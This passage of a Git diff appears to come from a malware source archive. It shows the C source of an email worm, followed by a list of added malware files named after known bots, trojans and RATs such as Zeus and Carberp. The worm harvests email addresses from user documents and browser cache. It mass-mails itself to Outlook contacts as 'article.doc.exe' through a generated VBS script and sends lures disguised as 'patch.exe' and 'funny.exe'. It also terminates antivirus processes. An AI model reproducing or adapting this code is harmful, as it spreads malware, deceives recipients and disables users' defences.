RegQueryValueEx(hReg,"Desktop",0,&type,desktop,&sizdesktop);
RegQueryValueEx(hReg,"Favorites",0,&type,favoris,&sizfavoris);
RegQueryValueEx(hReg,"Personal",0,&type,personal,&sizpersonal);
RegQueryValueEx(hReg,"Cache",0,&type,cache,&sizcache);
RegCloseKey(hReg);
GetWindowsDirectory((char *)winhtm,100);
_asm
{
call @wininet
db "WININET.DLL",0
@wininet:
call LoadLibrary
test eax,eax
jz end_asm
mov ebp,eax
call @inetconnect
db "InternetGetConnectedState",0
@inetconnect:
push ebp
call GetProcAddress
test eax,eax
jz end_wininet
mov edi,eax
verf:
push 0
push Tmp
call edi
dec eax
jnz verf
end_wininet:
push ebp
call FreeLibrary
end_asm:
jmp end_all_asm
Tmp dd 0
end_all_asm:
}
FindFile(desktop,"*.htm");
FindFile(desktop,"*.doc");
FindFile(favoris,"*.ht*");
FindFile(personal,"*.ht*");
FindFile(personal,"*.doc");
FindFile(personal,"*.xls");
FindFile(personal,"*.asp");
FindFile(cache,".ht*");
FindFile(cache,".php");
FindFile(cache,".asp");
FindFile(winhtm,".ht*");
FindFile(winhtm,".doc");
vbsworm=fopen("wargames.vbs","w");
fprintf(vbsworm,"On Error Resume Next\n");
fprintf(vbsworm,"msgbox %cScripting.FileSystemObject%c\n",34,34);
fprintf(vbsworm,"Set sf=CreateObject(%cScripting.FileSystemObject%c)\n",34,34);
fprintf(vbsworm,"Set sys=sf.GetSpecialFolder(1)\n");
fprintf(vbsworm,"Set OA=CreateObject(%cOutlook.Application%c)\n",34,34);
fprintf(vbsworm,"Set MA=OA.GetNameSpace(%cMAPI%c)\n",34,34);
fprintf(vbsworm,"For Each C In MA.AddressLists\n");
fprintf(vbsworm,"If C.AddressEntries.Count <> 0 Then\n");
fprintf(vbsworm,"For D=1 To C.AddressEntries.Count\n");
fprintf(vbsworm,"Set AD=C.AddressEntries(D)\n");
fprintf(vbsworm,"Set EM=OA.CreateItem(0)\n");
fprintf(vbsworm,"EM.To=AD.Address\n");
fprintf(vbsworm,"EM.Subject=%cHi %c&AD.Name&%c read this.%c\n",34,34,34,34);
fprintf(vbsworm,"body=%cI found this on the web and it is important.%c\n",34,34);
fprintf(vbsworm,"body = body & VbCrLf & %cOpen the attached file and read.%c\n",34,34);
fprintf(vbsworm,"EM.Body=body\n");
fprintf(vbsworm,"EM.Attachments.Add(sys&%c\\article.doc.exe%c)\n",34,34);
fprintf(vbsworm,"EM.DeleteAfterSubmit=True\n");
fprintf(vbsworm,"If EM.To <> %c%c Then\n",34,34);
fprintf(vbsworm,"EM.Send\n");
fprintf(vbsworm,"End If\n");
fprintf(vbsworm,"Next\n");
fprintf(vbsworm,"End If\n");
fprintf(vbsworm,"Next\n");
fclose(vbsworm);
ShellExecute(NULL,"open","wargames.vbs",NULL,NULL,SW_SHOWNORMAL);
Sleep(5000);
DeleteFile("wargames.vbs");
(FARPROC &)mLogon=GetProcAddress(hMAPI, "MAPILogon");
(FARPROC &)mLogoff=GetProcAddress(hMAPI, "MAPILogoff");
(FARPROC &)mFindNext=GetProcAddress(hMAPI, "MAPIFindNext");
(FARPROC &)mReadMail=GetProcAddress(hMAPI, "MAPIReadMail");
(FARPROC &)mFreeBuffer=GetProcAddress(hMAPI, "MAPIFreeBuffer");
mLogon(NULL,NULL,NULL,MAPI_NEW_SESSION,NULL,&session);
if(mFindNext(session,0,NULL,NULL,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS) {
do {
if(mReadMail(session,NULL,messId,MAPI_ENVELOPE_ONLY|MAPI_PEEK,NULL,&mes)==SUCCESS_SUCCESS) {
strcpy(mname,mes->lpOriginator->lpszName);
strcpy(maddr,mes->lpOriginator->lpszAddress);
mes->ulReserved=0;
mes->lpszSubject="Re: Fw:";
mes->lpszNoteText="I received your mail but I cannot reply immediatly.\n"
"I send you a nice program. Look at this.\n\n"
" See you soon.";
mes->lpszMessageType=NULL;
mes->lpszDateReceived=NULL;
mes->lpszConversationID=NULL;
mes->flFlags=MAPI_SENT;
mes->lpOriginator->ulReserved=0;
mes->lpOriginator->ulRecipClass=MAPI_ORIG;
mes->lpOriginator->lpszName=mes->lpRecips->lpszName;
mes->lpOriginator->lpszAddress=mes->lpRecips->lpszAddress;
mes->nRecipCount=1;
mes->lpRecips->ulReserved=0;
mes->lpRecips->ulRecipClass=MAPI_TO;
mes->lpRecips->lpszName=mname;
mes->lpRecips->lpszAddress=maddr;
mes->nFileCount=1;
mes->lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
memset(mes->lpFiles, 0, sizeof(MapiFileDesc));
mes->lpFiles->ulReserved=0;
mes->lpFiles->flFlags=NULL;
mes->lpFiles->nPosition=-1;
mes->lpFiles->lpszPathName=filename;
mes->lpFiles->lpszFileName="funny.exe";
mes->lpFiles->lpFileType=NULL;
mSendMail(session, NULL, mes, NULL, NULL);
}
}while(mFindNext(session,0,NULL,messId,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS);
free(mes->lpFiles);
mFreeBuffer(mes);
mLogoff(session,0,0,0);
FreeLibrary(hMAPI);
}
}
void FindFile(char *folder, char *ext)
{
register bool abc=TRUE;
register HANDLE hFile;
char mail[128];
SetCurrentDirectory(folder);
hFile=FindFirstFile(ext,&ffile);
if(hFile!=INVALID_HANDLE_VALUE) {
while(abc) {
SetFileAttributes(ffile.cFileName,FILE_ATTRIBUTE_ARCHIVE);
GetMail(ffile.cFileName,mail);
if(strlen(mail)>0) {
sendmail(mail);
}
abc=FindNextFile(hFile,&ffile);
}
}
}
void GetMail(char *namefile, char *mail)
{
HANDLE hf,hf2;
char *mapped;
DWORD size,i,k;
BOOL test=FALSE,valid=FALSE;
mail[0]=0;
hf=CreateFile(namefile,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,0);
if(hf==INVALID_HANDLE_VALUE)
return;
size=GetFileSize(hf,NULL);
if(!size)
return;
if(size<8)
return;
size-=100;
hf2=CreateFileMapping(hf,0,PAGE_READONLY,0,0,0);
if(!hf2) {
CloseHandle(hf);
return;
}
mapped=(char *)MapViewOfFile(hf2,FILE_MAP_READ,0,0,0);
if(!mapped) {
CloseHandle(hf2);
CloseHandle(hf);
return;
}
i=0;
while(i<size && !test) {
if(!strncmpi("mailto:",mapped+i,strlen("mailto:"))) {
test=TRUE;
i+=strlen("mailto:");
k=0;
while(mapped[i]!=34 && mapped[i]!=39 && i<size && k<127) {
if(mapped[i]!=' ') {
mail[k]=mapped[i];
k++;
if(mapped[i]=='@')
valid=TRUE;
}
i++;
}
mail[k]=0;
} else
i++;
}
if(!valid)
mail[0]=0;
UnmapViewOfFile(mapped);
CloseHandle(hf2);
CloseHandle(hf);
return;
}
void sendmail(char *tos)
{
memset(&mess,0,sizeof(MapiMessage));
memset(&from,0,sizeof(MapiRecipDesc));
wsprintf(subj,"Mail to %s.",tos);
from.lpszName=NULL;
from.ulRecipClass=MAPI_ORIG;
mess.lpszSubject=subj;
mess.lpszNoteText="I send you this patch.\n"
"It corrects a bug into Internet Explorer and Outlook.\n\n"
" Have a nice day. Best Regards.";
mess.lpRecips=(MapiRecipDesc *)malloc(sizeof(MapiRecipDesc));
if(!mess.lpRecips)
return;
memset(mess.lpRecips,0,sizeof(MapiRecipDesc));
mess.lpRecips->lpszName=tos;
mess.lpRecips->lpszAddress=tos;
mess.lpRecips->ulRecipClass=MAPI_TO;
mess.nRecipCount=1;
mess.lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
if(!mess.lpFiles)
return;
memset(mess.lpFiles,0,sizeof(MapiFileDesc));
mess.lpFiles->lpszPathName=filename;
mess.lpFiles->lpszFileName="patch.exe";
mess.nFileCount=1;
mess.lpOriginator=&from;
mSendMail(0,0,&mess,0,0);
free(mess.lpRecips);
free(mess.lpFiles);
}
void StopAV(char *antivirus)
{
register BOOL term;
lSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
uProcess.dwSize=sizeof(uProcess);
rProcessFound=Process32First(lSnapshot,&uProcess);
while(rProcessFound) {
if(strstr(uProcess.szExeFile,antivirus)!=NULL) {
myproc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,uProcess.th32ProcessID);
if(myproc!=NULL) {
term=TerminateProcess(myproc,0);
}
CloseHandle(myproc);
}
rProcessFound=Process32Next(lSnapshot,&uProcess);
}
CloseHandle(lSnapshot);
}

15931
Win32/I-Worm.Win9x.Troodon.asm Normal file

File diff suppressed because it is too large Load Diff

2461
Win32/I-Worm.XTC.asm Normal file

File diff suppressed because it is too large Load Diff

BIN
Win32/MonsterWorm.7z Normal file

Binary file not shown.

BIN
Win32/NytrojanByNytro.7z Normal file

Binary file not shown.

BIN
Win32/OminousRAT.7z Normal file

Binary file not shown.

BIN
Win32/PlutoniumByMr3amo.7z Normal file

Binary file not shown.

BIN
Win32/RST.Trojan.7z Normal file

Binary file not shown.

Binary file not shown.

BIN
Win32/Win32.4HorseMan.a.7z Normal file

Binary file not shown.

BIN
Win32/Win32.4HorseMan.b.7z Normal file

Binary file not shown.

BIN
Win32/Win32.A59.7z Normal file

Binary file not shown.

BIN
Win32/Win32.Acid.b.7z Normal file

Binary file not shown.

BIN
Win32/Win32.Ago.c.7z Normal file

Binary file not shown.

BIN
Win32/Win32.Ak.7z Normal file

Binary file not shown.

BIN
Win32/Win32.Beta.7z Normal file

Binary file not shown.

BIN
Win32/Win32.BlackDream.7z Normal file

Binary file not shown.

BIN
Win32/Win32.Carberp.7z Normal file

Binary file not shown.

BIN
Win32/Win32.Cyber.b.7z Normal file

Binary file not shown.

BIN
Win32/Win32.D.a.7z Normal file

Binary file not shown.

BIN
Win32/Win32.D.b.7z Normal file

Binary file not shown.

BIN
Win32/Win32.DarkAnal.7z Normal file

Binary file not shown.

BIN
Win32/Win32.Darkness.a.7z Normal file

Binary file not shown.

BIN
Win32/Win32.Darkness.b.7z Normal file

Binary file not shown.

BIN
Win32/Win32.EnglishRat.7z Normal file

Binary file not shown.

BIN
Win32/Win32.ForBot.7z Normal file

Binary file not shown.

BIN
Win32/Win32.FukJ.7z Normal file

Binary file not shown.

BIN
Win32/Win32.Fungus.7z Normal file

Binary file not shown.

BIN
Win32/Win32.Ganja.c.7z Normal file

Binary file not shown.

BIN
Win32/Win32.Grum.7z Normal file

Binary file not shown.

BIN
Win32/Win32.H.7z Normal file

Binary file not shown.

BIN
Win32/Win32.Hell.7z Normal file

Binary file not shown.

BIN
Win32/Win32.Hellbot.c.7z Normal file

Binary file not shown.

BIN
Win32/Win32.Hidden.7z Normal file

Binary file not shown.

BIN
Win32/Win32.Hydra.7z Normal file

Binary file not shown.

BIN
Win32/Win32.IMBot.7z Normal file

Binary file not shown.

BIN
Win32/Win32.Liquid.7z Normal file

Binary file not shown.

BIN
Win32/Win32.Litmus.7z Normal file

Binary file not shown.

BIN
Win32/Win32.Lolworm.7z Normal file

Binary file not shown.

BIN
Win32/Win32.Nes.e.7z Normal file

Binary file not shown.

BIN
Win32/Win32.Null.7z Normal file

Binary file not shown.

BIN
Win32/Win32.Nzm.7z Normal file

Binary file not shown.

BIN
Win32/Win32.Poshspy.7z Normal file

Binary file not shown.

BIN
Win32/Win32.Pwnbot.7z Normal file

Binary file not shown.

BIN
Win32/Win32.RBot.7z Normal file

Binary file not shown.

BIN
Win32/Win32.Rage.7z Normal file

Binary file not shown.

BIN
Win32/Win32.Reptile.7z Normal file

Binary file not shown.

BIN
Win32/Win32.Riot.7z Normal file

Binary file not shown.

BIN
Win32/Win32.Rose.c.7z Normal file

Binary file not shown.

BIN
Win32/Win32.Rubilyn.7z Normal file

Binary file not shown.

BIN
Win32/Win32.Ruff.7z Normal file

Binary file not shown.

BIN
Win32/Win32.Rx.7z Normal file

Binary file not shown.

BIN
Win32/Win32.S5.7z Normal file

Binary file not shown.

BIN
Win32/Win32.Sd.7z Normal file

Binary file not shown.

BIN
Win32/Win32.Sdx.7z Normal file

Binary file not shown.

BIN
Win32/Win32.Shadow.7z Normal file

Binary file not shown.

BIN
Win32/Win32.Shadow.a.7z Normal file

Binary file not shown.

BIN
Win32/Win32.Shadow.b.7z Normal file

Binary file not shown.

BIN
Win32/Win32.ShellbotFTP.7z Normal file

Binary file not shown.

Binary file not shown.

BIN
Win32/Win32.Skuz.7z Normal file

Binary file not shown.

BIN
Win32/Win32.Small.7z Normal file

Binary file not shown.

BIN
Win32/Win32.Spaz.b.7z Normal file

Binary file not shown.

BIN
Win32/Win32.Steam.7z Normal file

Binary file not shown.

BIN
Win32/Win32.Stolich.7z Normal file

Binary file not shown.

BIN
Win32/Win32.Sv.7z Normal file

Binary file not shown.

BIN
Win32/Win32.Tank.7z Normal file

Binary file not shown.

BIN
Win32/Win32.TinyNuke.7z Normal file

Binary file not shown.

BIN
Win32/Win32.Trochilus.7z Normal file

Binary file not shown.

BIN
Win32/Win32.Tsgh.7z Normal file

Binary file not shown.

BIN
Win32/Win32.Volk.7z Normal file

Binary file not shown.

BIN
Win32/Win32.Wisdom.c.7z Normal file

Binary file not shown.

BIN
Win32/Win32.Woodworm.7z Normal file

Binary file not shown.

BIN
Win32/Win32.Ya.7z Normal file

Binary file not shown.

BIN
Win32/Win32.Zemra.7z Normal file

Binary file not shown.

BIN
Win32/Win32.Zero.7z Normal file

Binary file not shown.

BIN
Win32/Win32.Zeus.a.7z Normal file

Binary file not shown.

BIN
Win32/Win32.Zeus.b.7z Normal file

Binary file not shown.

BIN
Win32/Win32.irBot.7z Normal file

Binary file not shown.